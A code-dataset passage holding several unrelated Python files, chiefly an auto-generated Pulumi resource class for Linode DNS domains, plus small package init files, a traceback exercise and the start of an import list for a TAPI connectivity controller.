def soa_email(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "soa_email", value)
@property
@pulumi.getter
def status(self) -> Optional[pulumi.Input[str]]:
"""
Used to control whether this Domain is currently being rendered (defaults to "active").
"""
return pulumi.get(self, "status")
@status.setter
def status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "status", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of tags applied to this object. Tags are for organizational purposes only.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="ttlSec")
def ttl_sec(self) -> Optional[pulumi.Input[int]]:
"""
'Time to Live' - the amount of time in seconds that this Domain's records may be cached by resolvers or other domain servers. Valid values are 300, 3600, 7200, 14400, 28800, 57600, 86400, 172800, 345600, 604800, 1209600, and 2419200 - any other value will be rounded to the nearest valid value.
"""
return pulumi.get(self, "ttl_sec")
@ttl_sec.setter
def ttl_sec(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "ttl_sec", value)
@pulumi.input_type
class _DomainState:
def __init__(__self__, *,
axfr_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
description: Optional[pulumi.Input[str]] = None,
domain: Optional[pulumi.Input[str]] = None,
expire_sec: Optional[pulumi.Input[int]] = None,
group: Optional[pulumi.Input[str]] = None,
master_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
refresh_sec: Optional[pulumi.Input[int]] = None,
retry_sec: Optional[pulumi.Input[int]] = None,
soa_email: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
ttl_sec: Optional[pulumi.Input[int]] = None,
type: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering Domain resources.
:param pulumi.Input[Sequence[pulumi.Input[str]]] axfr_ips: The list of IPs that may perform a zone transfer for this Domain. This is potentially dangerous, and should be set to an empty list unless you intend to use it.
:param pulumi.Input[str] description: A description for this Domain. This is for display purposes only.
:param pulumi.Input[str] domain: The domain this Domain represents. These must be unique in our system; you cannot have two Domains representing the same domain.
:param pulumi.Input[int] expire_sec: The amount of time in seconds that may pass before this Domain is no longer authoritative. Valid values are 300, 3600, 7200, 14400, 28800, 57600, 86400, 172800, 345600, 604800, 1209600, and 2419200 - any other value will be rounded to the nearest valid value.
:param pulumi.Input[str] group: The group this Domain belongs to. This is for display purposes only.
:param pulumi.Input[Sequence[pulumi.Input[str]]] master_ips: The IP addresses representing the master DNS for this Domain.
:param pulumi.Input[int] refresh_sec: The amount of time in seconds before this Domain should be refreshed. Valid values are 300, 3600, 7200, 14400, 28800, 57600, 86400, 172800, 345600, 604800, 1209600, and 2419200 - any other value will be rounded to the nearest valid value.
:param pulumi.Input[int] retry_sec: The interval, in seconds, at which a failed refresh should be retried. Valid values are 300, 3600, 7200, 14400, 28800, 57600, 86400, 172800, 345600, 604800, 1209600, and 2419200 - any other value will be rounded to the nearest valid value.
:param pulumi.Input[str] soa_email: Start of Authority email address. This is required for master Domains.
:param pulumi.Input[str] status: Used to control whether this Domain is currently being rendered (defaults to "active").
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A list of tags applied to this object. Tags are for organizational purposes only.
:param pulumi.Input[int] ttl_sec: 'Time to Live' - the amount of time in seconds that this Domain's records may be cached by resolvers or other domain servers. Valid values are 300, 3600, 7200, 14400, 28800, 57600, 86400, 172800, 345600, 604800, 1209600, and 2419200 - any other value will be rounded to the nearest valid value.
:param pulumi.Input[str] type: If this Domain represents the authoritative source of information for the domain it describes, or if it is a read-only copy of a master (also called a slave).
"""
if axfr_ips is not None:
pulumi.set(__self__, "axfr_ips", axfr_ips)
if description is not None:
pulumi.set(__self__, "description", description)
if domain is not None:
pulumi.set(__self__, "domain", domain)
if expire_sec is not None:
pulumi.set(__self__, "expire_sec", expire_sec)
if group is not None:
pulumi.set(__self__, "group", group)
if master_ips is not None:
pulumi.set(__self__, "master_ips", master_ips)
if refresh_sec is not None:
pulumi.set(__self__, "refresh_sec", refresh_sec)
if retry_sec is not None:
pulumi.set(__self__, "retry_sec", retry_sec)
if soa_email is not None:
pulumi.set(__self__, "soa_email", soa_email)
if status is not None:
pulumi.set(__self__, "status", status)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if ttl_sec is not None:
pulumi.set(__self__, "ttl_sec", ttl_sec)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="axfrIps")
def axfr_ips(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The list of IPs that may perform a zone transfer for this Domain. This is potentially dangerous, and should be set to an empty list unless you intend to use it.
"""
return pulumi.get(self, "axfr_ips")
@axfr_ips.setter
def axfr_ips(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "axfr_ips", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
A description for this Domain. This is for display purposes only.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def domain(self) -> Optional[pulumi.Input[str]]:
"""
The domain this Domain represents. These must be unique in our system; you cannot have two Domains representing the same domain.
"""
return pulumi.get(self, "domain")
@domain.setter
def domain(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "domain", value)
@property
@pulumi.getter(name="expireSec")
def expire_sec(self) -> Optional[pulumi.Input[int]]:
"""
The amount of time in seconds that may pass before this Domain is no longer authoritative. Valid values are 300, 3600, 7200, 14400, 28800, 57600, 86400, 172800, 345600, 604800, 1209600, and 2419200 - any other value will be rounded to the nearest valid value.
"""
return pulumi.get(self, "expire_sec")
@expire_sec.setter
def expire_sec(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "expire_sec", value)
@property
@pulumi.getter
def group(self) -> Optional[pulumi.Input[str]]:
"""
The group this Domain belongs to. This is for display purposes only.
"""
return pulumi.get(self, "group")
@group.setter
def group(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "group", value)
@property
@pulumi.getter(name="masterIps")
def master_ips(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The IP addresses representing the master DNS for this Domain.
"""
return pulumi.get(self, "master_ips")
@master_ips.setter
def master_ips(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "master_ips", value)
@property
@pulumi.getter(name="refreshSec")
def refresh_sec(self) -> Optional[pulumi.Input[int]]:
"""
The amount of time in seconds before this Domain should be refreshed. Valid values are 300, 3600, 7200, 14400, 28800, 57600, 86400, 172800, 345600, 604800, 1209600, and 2419200 - any other value will be rounded to the nearest valid value.
"""
return pulumi.get(self, "refresh_sec")
@refresh_sec.setter
def refresh_sec(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "refresh_sec", value)
@property
@pulumi.getter(name="retrySec")
def retry_sec(self) -> Optional[pulumi.Input[int]]:
"""
The interval, in seconds, at which a failed refresh should be retried. Valid values are 300, 3600, 7200, 14400, 28800, 57600, 86400, 172800, 345600, 604800, 1209600, and 2419200 - any other value will be rounded to the nearest valid value.
"""
return pulumi.get(self, "retry_sec")
@retry_sec.setter
def retry_sec(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "retry_sec", value)
@property
@pulumi.getter(name="soaEmail")
def soa_email(self) -> Optional[pulumi.Input[str]]:
"""
Start of Authority email address. This is required for master Domains.
"""
return pulumi.get(self, "soa_email")
@soa_email.setter
def soa_email(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "soa_email", value)
@property
@pulumi.getter
def status(self) -> Optional[pulumi.Input[str]]:
"""
Used to control whether this Domain is currently being rendered (defaults to "active").
"""
return pulumi.get(self, "status")
@status.setter
def status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "status", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of tags applied to this object. Tags are for organizational purposes only.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="ttlSec")
def ttl_sec(self) -> Optional[pulumi.Input[int]]:
"""
'Time to Live' - the amount of time in seconds that this Domain's records may be cached by resolvers or other domain servers. Valid values are 300, 3600, 7200, 14400, 28800, 57600, 86400, 172800, 345600, 604800, 1209600, and 2419200 - any other value will be rounded to the nearest valid value.
"""
return pulumi.get(self, "ttl_sec")
@ttl_sec.setter
def ttl_sec(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "ttl_sec", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
"""
If this Domain represents the authoritative source of information for the domain it describes, or if it is a read-only copy of a master (also called a slave).
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type", value)
class Domain(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
axfr_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
description: Optional[pulumi.Input[str]] = None,
domain: Optional[pulumi.Input[str]] = None,
expire_sec: Optional[pulumi.Input[int]] = None,
group: Optional[pulumi.Input[str]] = None,
master_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
refresh_sec: Optional[pulumi.Input[int]] = None,
retry_sec: Optional[pulumi.Input[int]] = None,
soa_email: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
ttl_sec: Optional[pulumi.Input[int]] = None,
type: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Provides a Linode Domain resource. This can be used to create, modify, and delete Linode Domains through Linode's managed DNS service.
For more information, see [DNS Manager](https://www.linode.com/docs/platform/manager/dns-manager/) and the [Linode APIv4 docs](https://developers.linode.com/api/v4#operation/createDomain).
## Example Usage
The following example shows how one might use this resource to configure a Domain Record attached to a Linode Domain.
```python
import pulumi
import pulumi_linode as linode
foobar_domain = linode.Domain("foobarDomain",
type="master",
domain="foobar.example",
soa_email="example@foobar.example",
tags=[
"foo",
"bar",
])
foobar_domain_record = linode.DomainRecord("foobarDomainRecord",
domain_id=foobar_domain.id,
name="www",
record_type="CNAME",
target="foobar.example")
```
## Attributes
This resource exports no additional attributes; however, `status` may reflect degraded states.
## Import
Linode Domains can be imported using the Linode Domain `id`, e.g.
```sh
$ pulumi import linode:index/domain:Domain foobar 1234567
```
The Linode Guide, [Import Existing Infrastructure to Terraform](https://www.linode.com/docs/applications/configuration-management/import-existing-infrastructure-to-terraform/), offers resource importing examples for Domains and other Linode resource types.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] axfr_ips: The list of IPs that may perform a zone transfer for this Domain. This is potentially dangerous, and should be set to an empty list unless you intend to use it.
:param pulumi.Input[str] description: A description for this Domain. This is for display purposes only.
:param pulumi.Input[str] domain: The domain this Domain represents. These must be unique in our system; you cannot have two Domains representing the same domain.
:param pulumi.Input[int] expire_sec: The amount of time in seconds that may pass before this Domain is no longer authoritative. Valid values are 300, 3600, 7200, 14400, 28800, 57600, 86400, 172800, 345600, 604800, 1209600, and 2419200 - any other value will be rounded to the nearest valid value.
:param pulumi.Input[str] group: The group this Domain belongs to. This is for display purposes only.
:param pulumi.Input[Sequence[pulumi.Input[str]]] master_ips: The IP addresses representing the master DNS for this Domain.
:param pulumi.Input[int] refresh_sec: The amount of time in seconds before this Domain should be refreshed. Valid values are 300, 3600, 7200, 14400, 28800, 57600, 86400, 172800, 345600, 604800, 1209600, and 2419200 - any other value will be rounded to the nearest valid value.
:param pulumi.Input[int] retry_sec: The interval, in seconds, at which a failed refresh should be retried. Valid values are 300, 3600, 7200, 14400, 28800, 57600, 86400, 172800, 345600, 604800, 1209600, and 2419200 - any other value will be rounded to the nearest valid value.
:param pulumi.Input[str] soa_email: Start of Authority email address. This is required for master Domains.
:param pulumi.Input[str] status: Used to control whether this Domain is currently being rendered (defaults to "active").
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A list of tags applied to this object. Tags are for organizational purposes only.
:param pulumi.Input[int] ttl_sec: 'Time to Live' - the amount of time in seconds that this Domain's records may be cached by resolvers or other domain servers. Valid values are 300, 3600, 7200, 14400, 28800, 57600, 86400, 172800, 345600, 604800, 1209600, and 2419200 - any other value will be rounded to the nearest valid value.
:param pulumi.Input[str] type: If this Domain represents the authoritative source of information for the domain it describes, or if it is a read-only copy of a master (also called a slave).
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: DomainArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides a Linode Domain resource. This can be used to create, modify, and delete Linode Domains through Linode's managed DNS service.
For more information, see [DNS Manager](https://www.linode.com/docs/platform/manager/dns-manager/) and the [Linode APIv4 docs](https://developers.linode.com/api/v4#operation/createDomain).
## Example Usage
The following example shows how one might use this resource to configure a Domain Record attached to a Linode Domain.
```python
import pulumi
import pulumi_linode as linode
foobar_domain = linode.Domain("foobarDomain",
type="master",
domain="foobar.example",
soa_email="example@foobar.example",
tags=[
"foo",
"bar",
])
foobar_domain_record = linode.DomainRecord("foobarDomainRecord",
domain_id=foobar_domain.id,
name="www",
record_type="CNAME",
target="foobar.example")
```
## Attributes
This resource exports no additional attributes; however, `status` may reflect degraded states.
## Import
Linode Domains can be imported using the Linode Domain `id`, e.g.
```sh
$ pulumi import linode:index/domain:Domain foobar 1234567
```
The Linode Guide, [Import Existing Infrastructure to Terraform](https://www.linode.com/docs/applications/configuration-management/import-existing-infrastructure-to-terraform/), offers resource importing examples for Domains and other Linode resource types.
:param str resource_name: The name of the resource.
:param DomainArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(DomainArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
axfr_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
description: Optional[pulumi.Input[str]] = None,
domain: Optional[pulumi.Input[str]] = None,
expire_sec: Optional[pulumi.Input[int]] = None,
group: Optional[pulumi.Input[str]] = None,
master_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
refresh_sec: Optional[pulumi.Input[int]] = None,
retry_sec: Optional[pulumi.Input[int]] = None,
soa_email: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
ttl_sec: Optional[pulumi.Input[int]] = None,
type: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = DomainArgs.__new__(DomainArgs)
__props__.__dict__["axfr_ips"] = axfr_ips
__props__.__dict__["description"] = description
if domain is None and not opts.urn:
raise TypeError("Missing required property 'domain'")
__props__.__dict__["domain"] = domain
__props__.__dict__["expire_sec"] = expire_sec
__props__.__dict__["group"] = group
__props__.__dict__["master_ips"] = master_ips
__props__.__dict__["refresh_sec"] = refresh_sec
__props__.__dict__["retry_sec"] = retry_sec
__props__.__dict__["soa_email"] = soa_email
__props__.__dict__["status"] = status
__props__.__dict__["tags"] = tags
__props__.__dict__["ttl_sec"] = ttl_sec
if type is None and not opts.urn:
raise TypeError("Missing required property 'type'")
__props__.__dict__["type"] = type
super(Domain, __self__).__init__(
'linode:index/domain:Domain',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
axfr_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
description: Optional[pulumi.Input[str]] = None,
domain: Optional[pulumi.Input[str]] = None,
expire_sec: Optional[pulumi.Input[int]] = None,
group: Optional[pulumi.Input[str]] = None,
master_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
refresh_sec: Optional[pulumi.Input[int]] = None,
retry_sec: Optional[pulumi.Input[int]] = None,
soa_email: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
ttl_sec: Optional[pulumi.Input[int]] = None,
type: Optional[pulumi.Input[str]] = None) -> 'Domain':
"""
Get an existing Domain resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] axfr_ips: The list of IPs that may perform a zone transfer for this Domain. This is potentially dangerous, and should be set to an empty list unless you intend to use it.
:param pulumi.Input[str] description: A description for this Domain. This is for display purposes only.
:param pulumi.Input[str] domain: The domain this Domain represents. These must be unique in our system; you cannot have two Domains representing the same domain.
:param pulumi.Input[int] expire_sec: The amount of time in seconds that may pass before this Domain is no longer authoritative. Valid values are 300, 3600, 7200, 14400, 28800, 57600, 86400, 172800, 345600, 604800, 1209600, and 2419200 - any other value will be rounded to the nearest valid value.
:param pulumi.Input[str] group: The group this Domain belongs to. This is for display purposes only.
:param pulumi.Input[Sequence[pulumi.Input[str]]] master_ips: The IP addresses representing the master DNS for this Domain.
:param pulumi.Input[int] refresh_sec: The amount of time in seconds before this Domain should be refreshed. Valid values are 300, 3600, 7200, 14400, 28800, 57600, 86400, 172800, 345600, 604800, 1209600, and 2419200 - any other value will be rounded to the nearest valid value.
:param pulumi.Input[int] retry_sec: The interval, in seconds, at which a failed refresh should be retried. Valid values are 300, 3600, 7200, 14400, 28800, 57600, 86400, 172800, 345600, 604800, 1209600, and 2419200 - any other value will be rounded to the nearest valid value.
:param pulumi.Input[str] soa_email: Start of Authority email address. This is required for master Domains.
:param pulumi.Input[str] status: Used to control whether this Domain is currently being rendered (defaults to "active").
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A list of tags applied to this object. Tags are for organizational purposes only.
:param pulumi.Input[int] ttl_sec: 'Time to Live' - the amount of time in seconds that this Domain's records may be cached by resolvers or other domain servers. Valid values are 300, 3600, 7200, 14400, 28800, 57600, 86400, 172800, 345600, 604800, 1209600, and 2419200 - any other value will be rounded to the nearest valid value.
:param pulumi.Input[str] type: If this Domain represents the authoritative source of information for the domain it describes, or if it is a read-only copy of a master (also called a slave).
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _DomainState.__new__(_DomainState)
__props__.__dict__["axfr_ips"] = axfr_ips
__props__.__dict__["description"] = description
__props__.__dict__["domain"] = domain
__props__.__dict__["expire_sec"] = expire_sec
__props__.__dict__["group"] = group
__props__.__dict__["master_ips"] = master_ips
__props__.__dict__["refresh_sec"] = refresh_sec
__props__.__dict__["retry_sec"] = retry_sec
__props__.__dict__["soa_email"] = soa_email
__props__.__dict__["status"] = status
__props__.__dict__["tags"] = tags
__props__.__dict__["ttl_sec"] = ttl_sec
__props__.__dict__["type"] = type
return Domain(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="axfrIps")
def axfr_ips(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
The list of IPs that may perform a zone transfer for this Domain. This is potentially dangerous, and should be set to an empty list unless you intend to use it.
"""
return pulumi.get(self, "axfr_ips")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
A description for this Domain. This is for display purposes only.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter
def domain(self) -> pulumi.Output[str]:
"""
The domain this Domain represents. These must be unique in our system; you cannot have two Domains representing the same domain.
"""
return pulumi.get(self, "domain")
@property
@pulumi.getter(name="expireSec")
def expire_sec(self) -> pulumi.Output[Optional[int]]:
"""
The amount of time in seconds that may pass before this Domain is no longer authoritative. Valid values are 300, 3600, 7200, 14400, 28800, 57600, 86400, 172800, 345600, 604800, 1209600, and 2419200 - any other value will be rounded to the nearest valid value.
"""
return pulumi.get(self, "expire_sec")
@property
@pulumi.getter
def group(self) -> pulumi.Output[Optional[str]]:
"""
The group this Domain belongs to. This is for display purposes only.
"""
return pulumi.get(self, "group")
@property
@pulumi.getter(name="masterIps")
def master_ips(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
The IP addresses representing the master DNS for this Domain.
"""
return pulumi.get(self, "master_ips")
@property
@pulumi.getter(name="refreshSec")
def refresh_sec(self) -> pulumi.Output[Optional[int]]:
"""
The amount of time in seconds before this Domain should be refreshed. Valid values are 300, 3600, 7200, 14400, 28800, 57600, 86400, 172800, 345600, 604800, 1209600, and 2419200 - any other value will be rounded to the nearest valid value.
"""
return pulumi.get(self, "refresh_sec")
@property
@pulumi.getter(name="retrySec")
def retry_sec(self) -> pulumi.Output[Optional[int]]:
"""
The interval, in seconds, at which a failed refresh should be retried. Valid values are 300, 3600, 7200, 14400, 28800, 57600, 86400, 172800, 345600, 604800, 1209600, and 2419200 - any other value will be rounded to the nearest valid value.
"""
return pulumi.get(self, "retry_sec")
@property
@pulumi.getter(name="soaEmail")
def soa_email(self) -> pulumi.Output[Optional[str]]:
"""
Start of Authority email address. This is required for master Domains.
"""
return pulumi.get(self, "soa_email")
@property
@pulumi.getter
def status(self) -> pulumi.Output[str]:
"""
Used to control whether this Domain is currently being rendered (defaults to "active").
"""
return pulumi.get(self, "status")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
A list of tags applied to this object. Tags are for organizational purposes only.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter(name="ttlSec")
def ttl_sec(self) -> pulumi.Output[Optional[int]]:
"""
'Time to Live' - the amount of time in seconds that this Domain's records may be cached by resolvers or other domain servers. Valid values are 300, 3600, 7200, 14400, 28800, 57600, 86400, 172800, 345600, 604800, 1209600, and 2419200 - any other value will be rounded to the nearest valid value.
"""
return pulumi.get(self, "ttl_sec")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Whether this Domain represents the authoritative source of information for the domain it describes, or is a read-only copy of a master (also called a slave).
"""
return pulumi.get(self, "type")
avg_line_length: 52.191624 | max_line_length: 336 | alphanum_fraction: 0.658229 | [remaining per-file qsc_* quality-signal values were flattened one per line in the source and are not reliably reconstructable; omitted]
--- file record ---
hexsha: 745ec1709a9d2efbfc6eb9fcfddf09019d58ed2c | size: 197 | ext: py | lang: Python
path: rabpro/__init__.py | repo: jsta/rabpro @ 44301c6a08c14654b27a3475b89898afca0af329 | licenses: ["BSD-3-Clause"]
stars: 2 (2021-12-17T21:23:21.000Z to 2021-12-19T06:12:28.000Z) | issues: 45 (2021-08-09T17:00:59.000Z to 2022-01-07T18:42:41.000Z) | forks: 4 (2021-08-09T19:28:53.000Z to 2021-12-17T21:21:51.000Z)
content:
from . import elev_profile
from . import merit_utils
from . import core
from .core import profiler
from . import subbasin_stats
from . import subbasins
from . import data_utils
from . import utils
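# --- Editor's note (sketch; not part of the package) ---
# These imports re-export the submodules and core.profiler at the top level,
# so the two names below resolve to the same object:
#
#     import rabpro
#     assert rabpro.profiler is rabpro.core.profiler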
avg_line_length: 21.888889 | max_line_length: 28 | alphanum_fraction: 0.796954 | [remaining qsc_* quality-signal values omitted, as above]
--- file record ---
hexsha: 74933e3e450af0515d24b33c13fb2740bd9e2acc | size: 136 | ext: py | lang: Python
path: Darlington/phase1/python Basic 1/day 11 solution/qtn6.py | repo: CodedLadiesInnovateTech/-python-challenge-solutions @ 430cd3eb84a2905a286819eef384ee484d8eb9e7 | licenses: ["MIT"]
stars: 6 (2020-05-23T19:53:25.000Z to 2021-05-08T20:21:30.000Z) | issues: 8 (2020-05-14T18:53:12.000Z to 2020-07-03T00:06:20.000Z) | forks: 39 (2020-05-10T20:55:02.000Z to 2020-09-12T17:40:59.000Z)
content:
# Program to print the current call stack.
import traceback

print()

def f1():
    return abc()

def abc():
    # print_stack() writes the frames of the current call stack to stderr.
    traceback.print_stack()

f1()
print()
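# --- Editor's sketch: capturing the stack instead of printing it ---
# traceback.format_stack() walks the same frames as print_stack(), but
# returns them as a list of strings, which is convenient for logging.
import traceback

def capture():
    return traceback.format_stack()

print("".join(capture()[-2:]))  # show the two innermost frames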
avg_line_length: 17 | max_line_length: 41 | alphanum_fraction: 0.735294 | [remaining qsc_* quality-signal values omitted, as above]
--- file record ---
hexsha: 77c7c1e95e732146129cbd092cd17baebc59a11f | size: 414 | ext: py | lang: Python
path: chainerui/models/__init__.py | repo: chainer/chainerui @ 91c5c26d9154a008079dbb0bcbf69b5590d105f7 | licenses: ["MIT"]
stars: 185 (2017-12-15T09:24:07.000Z to 2022-01-20T11:20:13.000Z) | issues: 191 (2017-12-15T09:14:52.000Z to 2022-02-17T14:09:19.000Z) | forks: 29 (2017-12-15T09:40:45.000Z to 2022-03-13T11:21:11.000Z)
content:
from chainerui.models.argument import Argument # NOQA
from chainerui.models.asset import Asset # NOQA
from chainerui.models.bindata import Bindata # NOQA
from chainerui.models.command import Command # NOQA
from chainerui.models.log import Log # NOQA
from chainerui.models.project import Project # NOQA
from chainerui.models.result import Result # NOQA
from chainerui.models.snapshot import Snapshot # NOQA
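# --- Editor's note (sketch; not part of the package) ---
# The bare "# NOQA" markers suppress flake8 warnings on these lines (notably
# F401, "imported but unused"): the imports exist purely to re-export the
# model classes at package level, e.g.:
#
#     from chainerui.models import Project, Result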
avg_line_length: 46 | max_line_length: 54 | alphanum_fraction: 0.806763 | [remaining qsc_* quality-signal values omitted, as above]
--- file record ---
hexsha: 7ae868f58de70a271d801f147bcf6091971a6a23 | size: 107,733 | ext: py | lang: Python
path: RI/flask_server/tapi_server/controllers/tapi_connectivity_controller.py | repo: arthurMll/TAPI @ e1171bb139c6791a953af09cfc2bc7ad928da73d | licenses: ["Apache-2.0"]
stars: 57 (2018-04-09T08:56:18.000Z to 2022-03-23T08:31:06.000Z) | issues: 143 (2016-06-08T04:09:54.000Z to 2018-02-23T10:45:59.000Z) | forks: 64 (2018-03-07T07:55:17.000Z to 2022-03-28T07:14:28.000Z)
content:
import connexion
import six
from tapi_server.models.inline_object1 import InlineObject1 # noqa: E501
from tapi_server.models.inline_object12 import InlineObject12 # noqa: E501
from tapi_server.models.inline_object13 import InlineObject13 # noqa: E501
from tapi_server.models.inline_object14 import InlineObject14 # noqa: E501
from tapi_server.models.inline_object27 import InlineObject27 # noqa: E501
from tapi_server.models.inline_object6 import InlineObject6 # noqa: E501
from tapi_server.models.tapi_common_bandwidth_profile import TapiCommonBandwidthProfile # noqa: E501
from tapi_server.models.tapi_common_capacity import TapiCommonCapacity # noqa: E501
from tapi_server.models.tapi_common_capacity_value import TapiCommonCapacityValue # noqa: E501
from tapi_server.models.tapi_common_name_and_value import TapiCommonNameAndValue # noqa: E501
from tapi_server.models.tapi_common_service_interface_point_ref import TapiCommonServiceInterfacePointRef # noqa: E501
from tapi_server.models.tapi_common_time_range import TapiCommonTimeRange # noqa: E501
from tapi_server.models.tapi_connectivity_ceplist_connection_end_point import TapiConnectivityCeplistConnectionEndPoint # noqa: E501
from tapi_server.models.tapi_connectivity_connection import TapiConnectivityConnection # noqa: E501
from tapi_server.models.tapi_connectivity_connection_end_point_ref import TapiConnectivityConnectionEndPointRef # noqa: E501
from tapi_server.models.tapi_connectivity_connection_ref import TapiConnectivityConnectionRef # noqa: E501
from tapi_server.models.tapi_connectivity_connectivity_context import TapiConnectivityConnectivityContext # noqa: E501
from tapi_server.models.tapi_connectivity_connectivity_service_ref import TapiConnectivityConnectivityServiceRef # noqa: E501
from tapi_server.models.tapi_connectivity_connectivitycontext_connectivity_service import TapiConnectivityConnectivitycontextConnectivityService # noqa: E501
from tapi_server.models.tapi_connectivity_connectivityservice_end_point import TapiConnectivityConnectivityserviceEndPoint # noqa: E501
from tapi_server.models.tapi_connectivity_context_topologycontext_topology_node_ownednodeedgepoint_cep_list import TapiConnectivityContextTopologycontextTopologyNodeOwnednodeedgepointCepList # noqa: E501
from tapi_server.models.tapi_connectivity_create_connectivity_service import TapiConnectivityCreateConnectivityService # noqa: E501
from tapi_server.models.tapi_connectivity_get_connection_details import TapiConnectivityGetConnectionDetails # noqa: E501
from tapi_server.models.tapi_connectivity_get_connection_end_point_details import TapiConnectivityGetConnectionEndPointDetails # noqa: E501
from tapi_server.models.tapi_connectivity_get_connectivity_service_details import TapiConnectivityGetConnectivityServiceDetails # noqa: E501
from tapi_server.models.tapi_connectivity_get_connectivity_service_list import TapiConnectivityGetConnectivityServiceList # noqa: E501
from tapi_server.models.tapi_connectivity_route import TapiConnectivityRoute # noqa: E501
from tapi_server.models.tapi_connectivity_route_ref import TapiConnectivityRouteRef # noqa: E501
from tapi_server.models.tapi_connectivity_switch import TapiConnectivitySwitch # noqa: E501
from tapi_server.models.tapi_connectivity_switch_control import TapiConnectivitySwitchControl # noqa: E501
from tapi_server.models.tapi_connectivity_switch_control_ref import TapiConnectivitySwitchControlRef # noqa: E501
